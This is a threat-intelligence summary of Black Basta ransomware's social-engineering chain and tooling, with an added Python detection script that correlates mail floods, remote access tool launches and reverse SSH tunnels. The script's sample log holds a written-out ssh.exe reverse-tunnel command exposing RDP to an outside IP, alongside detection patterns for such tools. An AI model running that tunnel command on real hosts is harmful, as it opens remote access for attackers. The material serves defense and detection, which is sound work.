Recent reporting shows that Black Basta ransomware operators have shifted their attack strategy, adding new payloads such as Zbot and DarkGate since October 2024. The group has adopted more elaborate social engineering: an email bombing campaign that floods the target's inbox, followed by direct contact with the target under the guise of helping with the flood.
Attack Methodology:
– Initial contact through Microsoft Teams, impersonating IT support staff
– Deployment of legitimate remote access tools (AnyDesk, ScreenConnect, TeamViewer, Quick Assist)
– Malicious QR codes that steer the user to credential-theft pages or to compromised infrastructure
– Deployment of the OpenSSH client on the victim host to open a reverse shell or tunnel back to attacker infrastructure
New Payload Delivery:
Once remote access is established, the attackers use it to deploy:
– Custom credential harvesting tools
– Zbot (ZLoader)
– DarkGate malware
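The defender-side counterpart to the chain above, as an added example that is not part of the original report: Python that correlates constructed mail-gateway records with Windows process-creation events (Sysmon Event ID 1 style fields) to flag the email bombing burst, the remote access tool launched during the fake IT-support contact, and an OpenSSH client started as a reverse tunnel on the same host. The burst thresholds, the two-hour follow-on window, the account-to-mailbox mapping, and every hostname, account, path and IP address are assumptions for illustration, not indicators from the report.

```python
"""Correlate the chain above across two constructed log sources: mail-gateway
delivery records (the email bombing burst) and Windows process-creation events
(the remote access tool started during the fake IT call, then the OpenSSH
client launched as a reverse tunnel). All records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

REMOTE_TOOLS = {  # executables of the remote access tools the report names
    "anydesk.exe", "screenconnect.clientservice.exe",
    "screenconnect.windowsclient.exe", "teamviewer.exe", "quickassist.exe",
}
BURST_WINDOW = timedelta(minutes=10)    # sliding window for the mail burst (assumed)
BURST_THRESHOLD = 50                    # inbound mails per recipient per window (assumed)
FOLLOW_ON_WINDOW = timedelta(hours=2)   # how soon the "IT support" contact follows (assumed)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def mailbox_for(account):
    """Map 'CORP\\jdoe' to 'jdoe@corp.example' (assumed naming convention)."""
    return account.rsplit("\\", 1)[-1].lower() + "@corp.example"

def email_bursts(mail_events, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
    """Return {recipient: burst_start} for recipients who received at least
    `threshold` messages inside one sliding `window`."""
    by_rcpt = defaultdict(list)
    for e in mail_events:
        by_rcpt[e["rcpt"].lower()].append(datetime.fromisoformat(e["ts"]))
    bursts = {}
    for rcpt, times in by_rcpt.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                bursts[rcpt] = times[lo]
                break
    return bursts

def is_remote_tool(proc):
    return basename(proc["image"]) in REMOTE_TOOLS

def is_reverse_ssh(proc):
    """ssh.exe started with a remote forward (-R) or as a tunnel only (-N)."""
    if basename(proc["image"]) != "ssh.exe":
        return False
    return any(t.startswith("-R") or t == "-N" for t in proc["cmdline"].split()[1:])

def correlate(mail_events, proc_events):
    """One alert per (host, account) whose events chain in order:
    mail burst -> remote access tool within FOLLOW_ON_WINDOW -> reverse SSH."""
    bursts = email_bursts(mail_events)
    per_host = defaultdict(list)
    for p in proc_events:
        per_host[(p["host"], p["account"].lower())].append(p)
    alerts = []
    for (host, account), procs in per_host.items():
        burst_at = bursts.get(mailbox_for(account))
        if burst_at is None:
            continue
        stages, rat_at = [("email_bombing", burst_at.isoformat())], None
        for p in sorted(procs, key=lambda p: p["ts"]):
            ts = datetime.fromisoformat(p["ts"])
            if rat_at is None and burst_at <= ts <= burst_at + FOLLOW_ON_WINDOW \
                    and is_remote_tool(p):
                rat_at = ts
                stages.append(("remote_access_tool", basename(p["image"])))
            elif rat_at is not None and ts >= rat_at and is_reverse_ssh(p):
                stages.append(("reverse_ssh", p["cmdline"]))
                break
        if len(stages) > 1:
            alerts.append({"host": host, "account": account, "stages": stages,
                           "severity": "high" if len(stages) == 3 else "medium"})
    return alerts

# Constructed sample telemetry: 60 subscription mails to one user in 8 minutes,
# then AnyDesk and a reverse SSH tunnel on that user's workstation; a second
# user gets normal mail volume and a TeamViewer launch, which must not alert.
BASE = datetime(2024, 11, 4, 9, 0)
MAIL_LOG = [{"ts": (BASE + timedelta(seconds=8 * i)).isoformat(),
             "rcpt": "jdoe@corp.example"} for i in range(60)] + \
           [{"ts": (BASE + timedelta(minutes=3 * i)).isoformat(),
             "rcpt": "asmith@corp.example"} for i in range(4)]
PROC_LOG = [
    {"ts": "2024-11-04T09:41:10", "host": "WS-0413", "account": r"CORP\jdoe",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"ts": "2024-11-04T10:02:45", "host": "WS-0413", "account": r"CORP\jdoe",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 -o StrictHostKeyChecking=no svc@198.51.100.7"},
    {"ts": "2024-11-04T11:15:00", "host": "WS-0222", "account": r"CORP\asmith",
     "image": r"C:\Program Files\TeamViewer\TeamViewer.exe", "cmdline": "TeamViewer.exe"},
]

if __name__ == "__main__":
    for a in correlate(MAIL_LOG, PROC_LOG):
        print(a["severity"], a["host"], a["account"], [s[0] for s in a["stages"]])
```

The point of chaining the stages rather than alerting on each alone is precision: legitimate Quick Assist or AnyDesk sessions are common in most environments, and the OpenSSH client ships with Windows, but a help-desk tool launched within two hours of a mail flood, followed by `ssh.exe -R` on the same host, is the sequence the report describes. Tune the burst threshold to the baseline of your own mail gateway, and feed real Sysmon or EDR process events in place of the constructed `PROC_LOG`.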
Technical Arsenal:
Black Basta's custom tooling, as documented in incident reporting, includes:
– KNOTWRAP: Memory-only C/C++ dropper
– KNOTROCK: .NET-based ransomware executor
– DAWNCRY: Memory-resident payload dropper
– PORTYARD: Custom TCP protocol tunneler
– COGSCAN: Network reconnaissance tool
Evolution from Conti:
Since emerging after Conti's dissolution in 2022, Black Basta has moved from operations that depended on QakBot for initial access to a hybrid approach that combines botnet-delivered malware with direct social engineering. Microsoft tracks the actor behind this Quick Assist abuse as Storm-1811.
The group's objectives on a compromised host remain consistent: rapid enumeration of the environment, theft of credentials, and capture of VPN configuration files to gain unauthorized access to the wider network.